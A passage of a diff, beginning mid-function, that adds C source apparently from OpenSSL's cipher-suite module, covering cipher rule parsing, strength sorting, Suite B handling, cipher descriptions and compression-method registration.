+                ll_append_tail(&head, curr, &tail);
+                curr->active = 1;
+            }
+        }
+        /* Move the added cipher to this location */
+        else if (rule == CIPHER_ORD) {
+            /* reverse == 0 */
+            if (curr->active) {
+                ll_append_tail(&head, curr, &tail);
+            }
+        } else if (rule == CIPHER_DEL) {
+            /* reverse == 1 */
+            if (curr->active) {
+                /*
+                 * most recently deleted ciphersuites get best positions for
+                 * any future CIPHER_ADD (note that the CIPHER_DEL loop works
+                 * in reverse to maintain the order)
+                 */
+                ll_append_head(&head, curr, &tail);
+                curr->active = 0;
+            }
+        } else if (rule == CIPHER_KILL) {
+            /* reverse == 0 */
+            if (head == curr)
+                head = curr->next;
+            else
+                curr->prev->next = curr->next;
+            if (tail == curr)
+                tail = curr->prev;
+            curr->active = 0;
+            if (curr->next != NULL)
+                curr->next->prev = curr->prev;
+            if (curr->prev != NULL)
+                curr->prev->next = curr->next;
+            curr->next = NULL;
+            curr->prev = NULL;
+        }
+    }
+
+    *head_p = head;
+    *tail_p = tail;
+}
+
+static int ssl_cipher_strength_sort(CIPHER_ORDER **head_p,
+                                    CIPHER_ORDER **tail_p)
+{
+    int max_strength_bits, i, *number_uses;
+    CIPHER_ORDER *curr;
+
+    /*
+     * This routine sorts the ciphers with descending strength. The sorting
+     * must keep the pre-sorted sequence, so we apply the normal sorting
+     * routine as '+' movement to the end of the list.
+     */
+    max_strength_bits = 0;
+    curr = *head_p;
+    while (curr != NULL) {
+        if (curr->active && (curr->cipher->strength_bits > max_strength_bits))
+            max_strength_bits = curr->cipher->strength_bits;
+        curr = curr->next;
+    }
+
+    number_uses = OPENSSL_malloc((max_strength_bits + 1) * sizeof(int));
+    if (!number_uses) {
+        SSLerr(SSL_F_SSL_CIPHER_STRENGTH_SORT, ERR_R_MALLOC_FAILURE);
+        return (0);
+    }
+    memset(number_uses, 0, (max_strength_bits + 1) * sizeof(int));
+
+    /*
+     * Now find the strength_bits values actually used
+     */
+    curr = *head_p;
+    while (curr != NULL) {
+        if (curr->active)
+            number_uses[curr->cipher->strength_bits]++;
+        curr = curr->next;
+    }
+    /*
+     * Go through the list of used strength_bits values in descending
+     * order.
+     */
+    for (i = max_strength_bits; i >= 0; i--)
+        if (number_uses[i] > 0)
+            ssl_cipher_apply_rule(0, 0, 0, 0, 0, 0, 0, CIPHER_ORD, i, head_p,
+                                  tail_p);
+
+    OPENSSL_free(number_uses);
+    return (1);
+}
+
+static int ssl_cipher_process_rulestr(const char *rule_str,
+                                      CIPHER_ORDER **head_p,
+                                      CIPHER_ORDER **tail_p,
+                                      const SSL_CIPHER **ca_list)
+{
+    unsigned long alg_mkey, alg_auth, alg_enc, alg_mac, alg_ssl,
+        algo_strength;
+    const char *l, *buf;
+    int j, multi, found, rule, retval, ok, buflen;
+    unsigned long cipher_id = 0;
+    char ch;
+
+    retval = 1;
+    l = rule_str;
+    for (;;) {
+        ch = *l;
+
+        if (ch == '\0')
+            break;              /* done */
+        if (ch == '-') {
+            rule = CIPHER_DEL;
+            l++;
+        } else if (ch == '+') {
+            rule = CIPHER_ORD;
+            l++;
+        } else if (ch == '!') {
+            rule = CIPHER_KILL;
+            l++;
+        } else if (ch == '@') {
+            rule = CIPHER_SPECIAL;
+            l++;
+        } else {
+            rule = CIPHER_ADD;
+        }
+
+        if (ITEM_SEP(ch)) {
+            l++;
+            continue;
+        }
+
+        alg_mkey = 0;
+        alg_auth = 0;
+        alg_enc = 0;
+        alg_mac = 0;
+        alg_ssl = 0;
+        algo_strength = 0;
+
+        for (;;) {
+            ch = *l;
+            buf = l;
+            buflen = 0;
+#ifndef CHARSET_EBCDIC
+            while (((ch >= 'A') && (ch <= 'Z')) ||
+                   ((ch >= '0') && (ch <= '9')) ||
+                   ((ch >= 'a') && (ch <= 'z')) || (ch == '-') || (ch == '.'))
+#else
+            while (isalnum(ch) || (ch == '-') || (ch == '.'))
+#endif
+            {
+                ch = *(++l);
+                buflen++;
+            }
+
+            if (buflen == 0) {
+                /*
+                 * We hit something we cannot deal with,
+                 * it is no command or separator nor
+                 * alphanumeric, so we call this an error.
+                 */
+                SSLerr(SSL_F_SSL_CIPHER_PROCESS_RULESTR,
+                       SSL_R_INVALID_COMMAND);
+                retval = found = 0;
+                l++;
+                break;
+            }
+
+            if (rule == CIPHER_SPECIAL) {
+                found = 0;      /* unused -- avoid compiler warning */
+                break;          /* special treatment */
+            }
+
+            /* check for multi-part specification */
+            if (ch == '+') {
+                multi = 1;
+                l++;
+            } else
+                multi = 0;
+
+            /*
+             * Now search for the cipher alias in the ca_list. Be careful
+             * with the strncmp, because the "buflen" limitation
+             * will make the rule "ADH:SOME" and the cipher
+             * "ADH-MY-CIPHER" look like a match for buflen=3.
+             * So additionally check whether the cipher name found
+             * has the correct length. We can save a strlen() call:
+             * just checking for the '\0' at the right place is
+             * sufficient, we have to strncmp() anyway. (We cannot
+             * use strcmp(), because buf is not '\0' terminated.)
+             */
+            j = found = 0;
+            cipher_id = 0;
+            while (ca_list[j]) {
+                if (!strncmp(buf, ca_list[j]->name, buflen) &&
+                    (ca_list[j]->name[buflen] == '\0')) {
+                    found = 1;
+                    break;
+                } else
+                    j++;
+            }
+
+            if (!found)
+                break;          /* ignore this entry */
+
+            if (ca_list[j]->algorithm_mkey) {
+                if (alg_mkey) {
+                    alg_mkey &= ca_list[j]->algorithm_mkey;
+                    if (!alg_mkey) {
+                        found = 0;
+                        break;
+                    }
+                } else
+                    alg_mkey = ca_list[j]->algorithm_mkey;
+            }
+
+            if (ca_list[j]->algorithm_auth) {
+                if (alg_auth) {
+                    alg_auth &= ca_list[j]->algorithm_auth;
+                    if (!alg_auth) {
+                        found = 0;
+                        break;
+                    }
+                } else
+                    alg_auth = ca_list[j]->algorithm_auth;
+            }
+
+            if (ca_list[j]->algorithm_enc) {
+                if (alg_enc) {
+                    alg_enc &= ca_list[j]->algorithm_enc;
+                    if (!alg_enc) {
+                        found = 0;
+                        break;
+                    }
+                } else
+                    alg_enc = ca_list[j]->algorithm_enc;
+            }
+
+            if (ca_list[j]->algorithm_mac) {
+                if (alg_mac) {
+                    alg_mac &= ca_list[j]->algorithm_mac;
+                    if (!alg_mac) {
+                        found = 0;
+                        break;
+                    }
+                } else
+                    alg_mac = ca_list[j]->algorithm_mac;
+            }
+
+            if (ca_list[j]->algo_strength & SSL_EXP_MASK) {
+                if (algo_strength & SSL_EXP_MASK) {
+                    algo_strength &=
+                        (ca_list[j]->algo_strength & SSL_EXP_MASK) |
+                        ~SSL_EXP_MASK;
+                    if (!(algo_strength & SSL_EXP_MASK)) {
+                        found = 0;
+                        break;
+                    }
+                } else
+                    algo_strength |= ca_list[j]->algo_strength & SSL_EXP_MASK;
+            }
+
+            if (ca_list[j]->algo_strength & SSL_STRONG_MASK) {
+                if (algo_strength & SSL_STRONG_MASK) {
+                    algo_strength &=
+                        (ca_list[j]->algo_strength & SSL_STRONG_MASK) |
+                        ~SSL_STRONG_MASK;
+                    if (!(algo_strength & SSL_STRONG_MASK)) {
+                        found = 0;
+                        break;
+                    }
+                } else
+                    algo_strength |=
+                        ca_list[j]->algo_strength & SSL_STRONG_MASK;
+            }
+
+            if (ca_list[j]->valid) {
+                /*
+                 * explicit ciphersuite found; its protocol version does not
+                 * become part of the search pattern!
+                 */
+
+                cipher_id = ca_list[j]->id;
+            } else {
+                /*
+                 * not an explicit ciphersuite; only in this case, the
+                 * protocol version is considered part of the search pattern
+                 */
+
+                if (ca_list[j]->algorithm_ssl) {
+                    if (alg_ssl) {
+                        alg_ssl &= ca_list[j]->algorithm_ssl;
+                        if (!alg_ssl) {
+                            found = 0;
+                            break;
+                        }
+                    } else
+                        alg_ssl = ca_list[j]->algorithm_ssl;
+                }
+            }
+
+            if (!multi)
+                break;
+        }
+
+        /*
+         * Ok, we have the rule, now apply it
+         */
+        if (rule == CIPHER_SPECIAL) { /* special command */
+            ok = 0;
+            if ((buflen == 8) && !strncmp(buf, "STRENGTH", 8))
+                ok = ssl_cipher_strength_sort(head_p, tail_p);
+            else
+                SSLerr(SSL_F_SSL_CIPHER_PROCESS_RULESTR,
+                       SSL_R_INVALID_COMMAND);
+            if (ok == 0)
+                retval = 0;
+            /*
+             * We do not support any "multi" options
+             * together with "@", so throw away the
+             * rest of the command, if any left, until
+             * end or ':' is found.
+             */
+            while ((*l != '\0') && !ITEM_SEP(*l))
+                l++;
+        } else if (found) {
+            ssl_cipher_apply_rule(cipher_id,
+                                  alg_mkey, alg_auth, alg_enc, alg_mac,
+                                  alg_ssl, algo_strength, rule, -1, head_p,
+                                  tail_p);
+        } else {
+            while ((*l != '\0') && !ITEM_SEP(*l))
+                l++;
+        }
+        if (*l == '\0')
+            break;              /* done */
+    }
+
+    return (retval);
+}
+
+#ifndef OPENSSL_NO_EC
+static int check_suiteb_cipher_list(const SSL_METHOD *meth, CERT *c,
+                                    const char **prule_str)
+{
+    unsigned int suiteb_flags = 0, suiteb_comb2 = 0;
+    if (!strcmp(*prule_str, "SUITEB128"))
+        suiteb_flags = SSL_CERT_FLAG_SUITEB_128_LOS;
+    else if (!strcmp(*prule_str, "SUITEB128ONLY"))
+        suiteb_flags = SSL_CERT_FLAG_SUITEB_128_LOS_ONLY;
+    else if (!strcmp(*prule_str, "SUITEB128C2")) {
+        suiteb_comb2 = 1;
+        suiteb_flags = SSL_CERT_FLAG_SUITEB_128_LOS;
+    } else if (!strcmp(*prule_str, "SUITEB192"))
+        suiteb_flags = SSL_CERT_FLAG_SUITEB_192_LOS;
+
+    if (suiteb_flags) {
+        c->cert_flags &= ~SSL_CERT_FLAG_SUITEB_128_LOS;
+        c->cert_flags |= suiteb_flags;
+    } else
+        suiteb_flags = c->cert_flags & SSL_CERT_FLAG_SUITEB_128_LOS;
+
+    if (!suiteb_flags)
+        return 1;
+    /* Check version: if TLS 1.2 ciphers allowed we can use Suite B */
+
+    if (!(meth->ssl3_enc->enc_flags & SSL_ENC_FLAG_TLS1_2_CIPHERS)) {
+        if (meth->ssl3_enc->enc_flags & SSL_ENC_FLAG_DTLS)
+            SSLerr(SSL_F_CHECK_SUITEB_CIPHER_LIST,
+                   SSL_R_ONLY_DTLS_1_2_ALLOWED_IN_SUITEB_MODE);
+        else
+            SSLerr(SSL_F_CHECK_SUITEB_CIPHER_LIST,
+                   SSL_R_ONLY_TLS_1_2_ALLOWED_IN_SUITEB_MODE);
+        return 0;
+    }
+# ifndef OPENSSL_NO_ECDH
+    switch (suiteb_flags) {
+    case SSL_CERT_FLAG_SUITEB_128_LOS:
+        if (suiteb_comb2)
+            *prule_str = "ECDHE-ECDSA-AES256-GCM-SHA384";
+        else
+            *prule_str =
+                "ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384";
+        break;
+    case SSL_CERT_FLAG_SUITEB_128_LOS_ONLY:
+        *prule_str = "ECDHE-ECDSA-AES128-GCM-SHA256";
+        break;
+    case SSL_CERT_FLAG_SUITEB_192_LOS:
+        *prule_str = "ECDHE-ECDSA-AES256-GCM-SHA384";
+        break;
+    }
+    /* Set auto ECDH parameter determination */
+    c->ecdh_tmp_auto = 1;
+    return 1;
+# else
+    SSLerr(SSL_F_CHECK_SUITEB_CIPHER_LIST,
+           SSL_R_ECDH_REQUIRED_FOR_SUITEB_MODE);
+    return 0;
+# endif
+}
+#endif
+
+STACK_OF(SSL_CIPHER) *ssl_create_cipher_list(const SSL_METHOD *ssl_method, STACK_OF(SSL_CIPHER)
+                                             **cipher_list, STACK_OF(SSL_CIPHER)
+                                             **cipher_list_by_id,
+                                             const char *rule_str, CERT *c)
+{
+    int ok, num_of_ciphers, num_of_alias_max, num_of_group_aliases;
+    unsigned long disabled_mkey, disabled_auth, disabled_enc, disabled_mac,
+        disabled_ssl;
+    STACK_OF(SSL_CIPHER) *cipherstack, *tmp_cipher_list;
+    const char *rule_p;
+    CIPHER_ORDER *co_list = NULL, *head = NULL, *tail = NULL, *curr;
+    const SSL_CIPHER **ca_list = NULL;
+
+    /*
+     * Return with error if nothing to do.
+     */
+    if (rule_str == NULL || cipher_list == NULL || cipher_list_by_id == NULL)
+        return NULL;
+#ifndef OPENSSL_NO_EC
+    if (!check_suiteb_cipher_list(ssl_method, c, &rule_str))
+        return NULL;
+#endif
+
+    /*
+     * To reduce the work to do we only want to process the compiled
+     * in algorithms, so we first get the mask of disabled ciphers.
+     */
+    ssl_cipher_get_disabled(&disabled_mkey, &disabled_auth, &disabled_enc,
+                            &disabled_mac, &disabled_ssl);
+
+    /*
+     * Now we have to collect the available ciphers from the compiled
+     * in ciphers. We cannot get more than the number compiled in, so
+     * it is used for allocation.
+     */
+    num_of_ciphers = ssl_method->num_ciphers();
+#ifdef KSSL_DEBUG
+    fprintf(stderr, "ssl_create_cipher_list() for %d ciphers\n",
+            num_of_ciphers);
+#endif                          /* KSSL_DEBUG */
+    co_list =
+        (CIPHER_ORDER *)OPENSSL_malloc(sizeof(CIPHER_ORDER) * num_of_ciphers);
+    if (co_list == NULL) {
+        SSLerr(SSL_F_SSL_CREATE_CIPHER_LIST, ERR_R_MALLOC_FAILURE);
+        return (NULL);          /* Failure */
+    }
+
+    ssl_cipher_collect_ciphers(ssl_method, num_of_ciphers,
+                               disabled_mkey, disabled_auth, disabled_enc,
+                               disabled_mac, disabled_ssl, co_list, &head,
+                               &tail);
+
+    /* Now arrange all ciphers by preference: */
+
+    /*
+     * Everything else being equal, prefer ephemeral ECDH over other key
+     * exchange mechanisms
+     */
+    ssl_cipher_apply_rule(0, SSL_kEECDH, 0, 0, 0, 0, 0, CIPHER_ADD, -1, &head,
+                          &tail);
+    ssl_cipher_apply_rule(0, SSL_kEECDH, 0, 0, 0, 0, 0, CIPHER_DEL, -1, &head,
+                          &tail);
+
+    /* AES is our preferred symmetric cipher */
+    ssl_cipher_apply_rule(0, 0, 0, SSL_AES, 0, 0, 0, CIPHER_ADD, -1, &head,
+                          &tail);
+
+    /* Temporarily enable everything else for sorting */
+    ssl_cipher_apply_rule(0, 0, 0, 0, 0, 0, 0, CIPHER_ADD, -1, &head, &tail);
+
+    /* Low priority for MD5 */
+    ssl_cipher_apply_rule(0, 0, 0, 0, SSL_MD5, 0, 0, CIPHER_ORD, -1, &head,
+                          &tail);
+
+    /*
+     * Move anonymous ciphers to the end.  Usually, these will remain
+     * disabled. (For applications that allow them, they aren't too bad, but
+     * we prefer authenticated ciphers.)
+     */
+    ssl_cipher_apply_rule(0, 0, SSL_aNULL, 0, 0, 0, 0, CIPHER_ORD, -1, &head,
+                          &tail);
+
+    /* Move ciphers without forward secrecy to the end */
+    ssl_cipher_apply_rule(0, 0, SSL_aECDH, 0, 0, 0, 0, CIPHER_ORD, -1, &head,
+                          &tail);
+    /*
+     * ssl_cipher_apply_rule(0, 0, SSL_aDH, 0, 0, 0, 0, CIPHER_ORD, -1,
+     * &head, &tail);
+     */
+    ssl_cipher_apply_rule(0, SSL_kRSA, 0, 0, 0, 0, 0, CIPHER_ORD, -1, &head,
+                          &tail);
+    ssl_cipher_apply_rule(0, SSL_kPSK, 0, 0, 0, 0, 0, CIPHER_ORD, -1, &head,
+                          &tail);
+    ssl_cipher_apply_rule(0, SSL_kKRB5, 0, 0, 0, 0, 0, CIPHER_ORD, -1, &head,
+                          &tail);
+
+    /* RC4 is sort-of broken -- move the the end */
+    ssl_cipher_apply_rule(0, 0, 0, SSL_RC4, 0, 0, 0, CIPHER_ORD, -1, &head,
+                          &tail);
+
+    /*
+     * Now sort by symmetric encryption strength.  The above ordering remains
+     * in force within each class
+     */
+    if (!ssl_cipher_strength_sort(&head, &tail)) {
+        OPENSSL_free(co_list);
+        return NULL;
+    }
+
+    /* Now disable everything (maintaining the ordering!) */
+    ssl_cipher_apply_rule(0, 0, 0, 0, 0, 0, 0, CIPHER_DEL, -1, &head, &tail);
+
+    /*
+     * We also need cipher aliases for selecting based on the rule_str.
+     * There might be two types of entries in the rule_str: 1) names
+     * of ciphers themselves 2) aliases for groups of ciphers.
+     * For 1) we need the available ciphers and for 2) the cipher
+     * groups of cipher_aliases added together in one list (otherwise
+     * we would be happy with just the cipher_aliases table).
+     */
+    num_of_group_aliases = sizeof(cipher_aliases) / sizeof(SSL_CIPHER);
+    num_of_alias_max = num_of_ciphers + num_of_group_aliases + 1;
+    ca_list = OPENSSL_malloc(sizeof(SSL_CIPHER *) * num_of_alias_max);
+    if (ca_list == NULL) {
+        OPENSSL_free(co_list);
+        SSLerr(SSL_F_SSL_CREATE_CIPHER_LIST, ERR_R_MALLOC_FAILURE);
+        return (NULL);          /* Failure */
+    }
+    ssl_cipher_collect_aliases(ca_list, num_of_group_aliases,
+                               disabled_mkey, disabled_auth, disabled_enc,
+                               disabled_mac, disabled_ssl, head);
+
+    /*
+     * If the rule_string begins with DEFAULT, apply the default rule
+     * before using the (possibly available) additional rules.
+     */
+    ok = 1;
+    rule_p = rule_str;
+    if (strncmp(rule_str, "DEFAULT", 7) == 0) {
+        ok = ssl_cipher_process_rulestr(SSL_DEFAULT_CIPHER_LIST,
+                                        &head, &tail, ca_list);
+        rule_p += 7;
+        if (*rule_p == ':')
+            rule_p++;
+    }
+
+    if (ok && (strlen(rule_p) > 0))
+        ok = ssl_cipher_process_rulestr(rule_p, &head, &tail, ca_list);
+
+    OPENSSL_free((void *)ca_list); /* Not needed anymore */
+
+    if (!ok) {                  /* Rule processing failure */
+        OPENSSL_free(co_list);
+        return (NULL);
+    }
+
+    /*
+     * Allocate new "cipherstack" for the result, return with error
+     * if we cannot get one.
+     */
+    if ((cipherstack = sk_SSL_CIPHER_new_null()) == NULL) {
+        OPENSSL_free(co_list);
+        return (NULL);
+    }
+
+    /*
+     * The cipher selection for the list is done. The ciphers are added
+     * to the resulting precedence to the STACK_OF(SSL_CIPHER).
+     */
+    for (curr = head; curr != NULL; curr = curr->next) {
+#ifdef OPENSSL_FIPS
+        if (curr->active
+            && (!FIPS_mode() || curr->cipher->algo_strength & SSL_FIPS))
+#else
+        if (curr->active)
+#endif
+        {
+            sk_SSL_CIPHER_push(cipherstack, curr->cipher);
+#ifdef CIPHER_DEBUG
+            fprintf(stderr, "<%s>\n", curr->cipher->name);
+#endif
+        }
+    }
+    OPENSSL_free(co_list);      /* Not needed any longer */
+
+    tmp_cipher_list = sk_SSL_CIPHER_dup(cipherstack);
+    if (tmp_cipher_list == NULL) {
+        sk_SSL_CIPHER_free(cipherstack);
+        return NULL;
+    }
+    if (*cipher_list != NULL)
+        sk_SSL_CIPHER_free(*cipher_list);
+    *cipher_list = cipherstack;
+    if (*cipher_list_by_id != NULL)
+        sk_SSL_CIPHER_free(*cipher_list_by_id);
+    *cipher_list_by_id = tmp_cipher_list;
+    (void)sk_SSL_CIPHER_set_cmp_func(*cipher_list_by_id,
+                                     ssl_cipher_ptr_id_cmp);
+
+    sk_SSL_CIPHER_sort(*cipher_list_by_id);
+    return (cipherstack);
+}
+
+char *SSL_CIPHER_description(const SSL_CIPHER *cipher, char *buf, int len)
+{
+    int is_export, pkl, kl;
+    const char *ver, *exp_str;
+    const char *kx, *au, *enc, *mac;
+    unsigned long alg_mkey, alg_auth, alg_enc, alg_mac, alg_ssl, alg2;
+#ifdef KSSL_DEBUG
+    static const char *format =
+        "%-23s %s Kx=%-8s Au=%-4s Enc=%-9s Mac=%-4s%s AL=%lx/%lx/%lx/%lx/%lx\n";
+#else
+    static const char *format =
+        "%-23s %s Kx=%-8s Au=%-4s Enc=%-9s Mac=%-4s%s\n";
+#endif                          /* KSSL_DEBUG */
+
+    alg_mkey = cipher->algorithm_mkey;
+    alg_auth = cipher->algorithm_auth;
+    alg_enc = cipher->algorithm_enc;
+    alg_mac = cipher->algorithm_mac;
+    alg_ssl = cipher->algorithm_ssl;
+
+    alg2 = cipher->algorithm2;
+
+    is_export = SSL_C_IS_EXPORT(cipher);
+    pkl = SSL_C_EXPORT_PKEYLENGTH(cipher);
+    kl = SSL_C_EXPORT_KEYLENGTH(cipher);
+    exp_str = is_export ? " export" : "";
+
+    if (alg_ssl & SSL_SSLV2)
+        ver = "SSLv2";
+    else if (alg_ssl & SSL_SSLV3)
+        ver = "SSLv3";
+    else if (alg_ssl & SSL_TLSV1_2)
+        ver = "TLSv1.2";
+    else
+        ver = "unknown";
+
+    switch (alg_mkey) {
+    case SSL_kRSA:
+        kx = is_export ? (pkl == 512 ? "RSA(512)" : "RSA(1024)") : "RSA";
+        break;
+    case SSL_kDHr:
+        kx = "DH/RSA";
+        break;
+    case SSL_kDHd:
+        kx = "DH/DSS";
+        break;
+    case SSL_kKRB5:
+        kx = "KRB5";
+        break;
+    case SSL_kEDH:
+        kx = is_export ? (pkl == 512 ? "DH(512)" : "DH(1024)") : "DH";
+        break;
+    case SSL_kECDHr:
+        kx = "ECDH/RSA";
+        break;
+    case SSL_kECDHe:
+        kx = "ECDH/ECDSA";
+        break;
+    case SSL_kEECDH:
+        kx = "ECDH";
+        break;
+    case SSL_kPSK:
+        kx = "PSK";
+        break;
+    case SSL_kSRP:
+        kx = "SRP";
+        break;
+    case SSL_kGOST:
+        kx = "GOST";
+        break;
+    default:
+        kx = "unknown";
+    }
+
+    switch (alg_auth) {
+    case SSL_aRSA:
+        au = "RSA";
+        break;
+    case SSL_aDSS:
+        au = "DSS";
+        break;
+    case SSL_aDH:
+        au = "DH";
+        break;
+    case SSL_aKRB5:
+        au = "KRB5";
+        break;
+    case SSL_aECDH:
+        au = "ECDH";
+        break;
+    case SSL_aNULL:
+        au = "None";
+        break;
+    case SSL_aECDSA:
+        au = "ECDSA";
+        break;
+    case SSL_aPSK:
+        au = "PSK";
+        break;
+    case SSL_aSRP:
+        au = "SRP";
+        break;
+    case SSL_aGOST94:
+        au = "GOST94";
+        break;
+    case SSL_aGOST01:
+        au = "GOST01";
+        break;
+    default:
+        au = "unknown";
+        break;
+    }
+
+    switch (alg_enc) {
+    case SSL_DES:
+        enc = (is_export && kl == 5) ? "DES(40)" : "DES(56)";
+        break;
+    case SSL_3DES:
+        enc = "3DES(168)";
+        break;
+    case SSL_RC4:
+        enc = is_export ? (kl == 5 ? "RC4(40)" : "RC4(56)")
+            : ((alg2 & SSL2_CF_8_BYTE_ENC) ? "RC4(64)" : "RC4(128)");
+        break;
+    case SSL_RC2:
+        enc = is_export ? (kl == 5 ? "RC2(40)" : "RC2(56)") : "RC2(128)";
+        break;
+    case SSL_IDEA:
+        enc = "IDEA(128)";
+        break;
+    case SSL_eNULL:
+        enc = "None";
+        break;
+    case SSL_AES128:
+        enc = "AES(128)";
+        break;
+    case SSL_AES256:
+        enc = "AES(256)";
+        break;
+    case SSL_AES128GCM:
+        enc = "AESGCM(128)";
+        break;
+    case SSL_AES256GCM:
+        enc = "AESGCM(256)";
+        break;
+    case SSL_CAMELLIA128:
+        enc = "Camellia(128)";
+        break;
+    case SSL_CAMELLIA256:
+        enc = "Camellia(256)";
+        break;
+    case SSL_SEED:
+        enc = "SEED(128)";
+        break;
+    case SSL_eGOST2814789CNT:
+        enc = "GOST89(256)";
+        break;
+    default:
+        enc = "unknown";
+        break;
+    }
+
+    switch (alg_mac) {
+    case SSL_MD5:
+        mac = "MD5";
+        break;
+    case SSL_SHA1:
+        mac = "SHA1";
+        break;
+    case SSL_SHA256:
+        mac = "SHA256";
+        break;
+    case SSL_SHA384:
+        mac = "SHA384";
+        break;
+    case SSL_AEAD:
+        mac = "AEAD";
+        break;
+    case SSL_GOST89MAC:
+        mac = "GOST89";
+        break;
+    case SSL_GOST94:
+        mac = "GOST94";
+        break;
+    default:
+        mac = "unknown";
+        break;
+    }
+
+    if (buf == NULL) {
+        len = 128;
+        buf = OPENSSL_malloc(len);
+        if (buf == NULL)
+            return ("OPENSSL_malloc Error");
+    } else if (len < 128)
+        return ("Buffer too small");
+
+#ifdef KSSL_DEBUG
+    BIO_snprintf(buf, len, format, cipher->name, ver, kx, au, enc, mac,
+                 exp_str, alg_mkey, alg_auth, alg_enc, alg_mac, alg_ssl);
+#else
+    BIO_snprintf(buf, len, format, cipher->name, ver, kx, au, enc, mac,
+                 exp_str);
+#endif                          /* KSSL_DEBUG */
+    return (buf);
+}
+
+char *SSL_CIPHER_get_version(const SSL_CIPHER *c)
+{
+    int i;
+
+    if (c == NULL)
+        return ("(NONE)");
+    i = (int)(c->id >> 24L);
+    if (i == 3)
+        return ("TLSv1/SSLv3");
+    else if (i == 2)
+        return ("SSLv2");
+    else
+        return ("unknown");
+}
+
+/* return the actual cipher being used */
+const char *SSL_CIPHER_get_name(const SSL_CIPHER *c)
+{
+    if (c != NULL)
+        return (c->name);
+    return ("(NONE)");
+}
+
+/* number of bits for symmetric cipher */
+int SSL_CIPHER_get_bits(const SSL_CIPHER *c, int *alg_bits)
+{
+    int ret = 0;
+
+    if (c != NULL) {
+        if (alg_bits != NULL)
+            *alg_bits = c->alg_bits;
+        ret = c->strength_bits;
+    }
+    return (ret);
+}
+
+unsigned long SSL_CIPHER_get_id(const SSL_CIPHER *c)
+{
+    return c->id;
+}
+
+SSL_COMP *ssl3_comp_find(STACK_OF(SSL_COMP) *sk, int n)
+{
+    SSL_COMP *ctmp;
+    int i, nn;
+
+    if ((n == 0) || (sk == NULL))
+        return (NULL);
+    nn = sk_SSL_COMP_num(sk);
+    for (i = 0; i < nn; i++) {
+        ctmp = sk_SSL_COMP_value(sk, i);
+        if (ctmp->id == n)
+            return (ctmp);
+    }
+    return (NULL);
+}
+
+#ifdef OPENSSL_NO_COMP
+void *SSL_COMP_get_compression_methods(void)
+{
+    return NULL;
+}
+
+int SSL_COMP_add_compression_method(int id, void *cm)
+{
+    return 1;
+}
+
+const char *SSL_COMP_get_name(const void *comp)
+{
+    return NULL;
+}
+#else
+STACK_OF(SSL_COMP) *SSL_COMP_get_compression_methods(void)
+{
+    load_builtin_compressions();
+    return (ssl_comp_methods);
+}
+
+STACK_OF(SSL_COMP) *SSL_COMP_set0_compression_methods(STACK_OF(SSL_COMP)
+                                                      *meths)
+{
+    STACK_OF(SSL_COMP) *old_meths = ssl_comp_methods;
+    ssl_comp_methods = meths;
+    return old_meths;
+}
+
+static void cmeth_free(SSL_COMP *cm)
+{
+    OPENSSL_free(cm);
+}
+
+void SSL_COMP_free_compression_methods(void)
+{
+    STACK_OF(SSL_COMP) *old_meths = ssl_comp_methods;
+    ssl_comp_methods = NULL;
+    sk_SSL_COMP_pop_free(old_meths, cmeth_free);
+}
+
+int SSL_COMP_add_compression_method(int id, COMP_METHOD *cm)
+{
+    SSL_COMP *comp;
+
+    if (cm == NULL || cm->type == NID_undef)
+        return 1;
+
+    /*-
+     * According to draft-ietf-tls-compression-04.txt, the
+     * compression number ranges should be the following:
+     *
+     *   0 to  63:  methods defined by the IETF
+     *  64 to 192:  external party methods assigned by IANA
+     * 193 to 255:  reserved for private use
+     */
+    if (id < 193 || id > 255) {
+        SSLerr(SSL_F_SSL_COMP_ADD_COMPRESSION_METHOD,
+               SSL_R_COMPRESSION_ID_NOT_WITHIN_PRIVATE_RANGE);
+        return 0;
+    }
+
+    MemCheck_off();
+    comp = (SSL_COMP *)OPENSSL_malloc(sizeof(SSL_COMP));
+    comp->id = id;
+    comp->method = cm;
+    load_builtin_compressions();
+    if (ssl_comp_methods && sk_SSL_COMP_find(ssl_comp_methods, comp) >= 0) {
+        OPENSSL_free(comp);
+        MemCheck_on();
+        SSLerr(SSL_F_SSL_COMP_ADD_COMPRESSION_METHOD,
+               SSL_R_DUPLICATE_COMPRESSION_ID);
+        return (1);
+    } else if ((ssl_comp_methods == NULL)
+               || !sk_SSL_COMP_push(ssl_comp_methods, comp)) {
+        OPENSSL_free(comp);
+        MemCheck_on();
+        SSLerr(SSL_F_SSL_COMP_ADD_COMPRESSION_METHOD, ERR_R_MALLOC_FAILURE);
+        return (1);
+    } else {
+        MemCheck_on();
+        return (0);
+    }
+}
+
+const char *SSL_COMP_get_name(const COMP_METHOD *comp)
+{
+    if (comp)
+        return comp->name;
+    return NULL;
+}
+#endif
+/* For a cipher return the index corresponding to the certificate type */
+int ssl_cipher_get_cert_index(const SSL_CIPHER *c)
+{
+    unsigned long alg_k, alg_a;
+
+    alg_k = c->algorithm_mkey;
+    alg_a = c->algorithm_auth;
+
+    if (alg_k & (SSL_kECDHr | SSL_kECDHe)) {
+        /*
+         * we don't need to look at SSL_kEECDH since no certificate is needed
+         * for anon ECDH and for authenticated EECDH, the check for the auth
+         * algorithm will set i correctly NOTE: For ECDH-RSA, we need an ECC
+         * not an RSA cert but for EECDH-RSA we need an RSA cert. Placing the
+         * checks for SSL_kECDH before RSA checks ensures the correct cert is
+         * chosen.
+         */
+        return SSL_PKEY_ECC;
+    } else if (alg_a & SSL_aECDSA)
+        return SSL_PKEY_ECC;
+    else if (alg_k & SSL_kDHr)
+        return SSL_PKEY_DH_RSA;
+    else if (alg_k & SSL_kDHd)
+        return SSL_PKEY_DH_DSA;
+    else if (alg_a & SSL_aDSS)
+        return SSL_PKEY_DSA_SIGN;
+    else if (alg_a & SSL_aRSA)
+        return SSL_PKEY_RSA_ENC;
+    else if (alg_a & SSL_aKRB5)
+        /* VRS something else here? */
+        return -1;
+    else if (alg_a & SSL_aGOST94)
+        return SSL_PKEY_GOST94;
+    else if (alg_a & SSL_aGOST01)
+        return SSL_PKEY_GOST01;
+    return -1;
+}
+
+const SSL_CIPHER *ssl_get_cipher_by_char(SSL *ssl, const unsigned char *ptr)
+{
+    const SSL_CIPHER *c;
+    c = ssl->method->get_cipher_by_char(ptr);
+    if (c == NULL || c->valid == 0)
+        return NULL;
+    return c;
+}
+
+const SSL_CIPHER *SSL_CIPHER_find(SSL *ssl, const unsigned char *ptr)
+{
+    return ssl->method->get_cipher_by_char(ptr);
+}
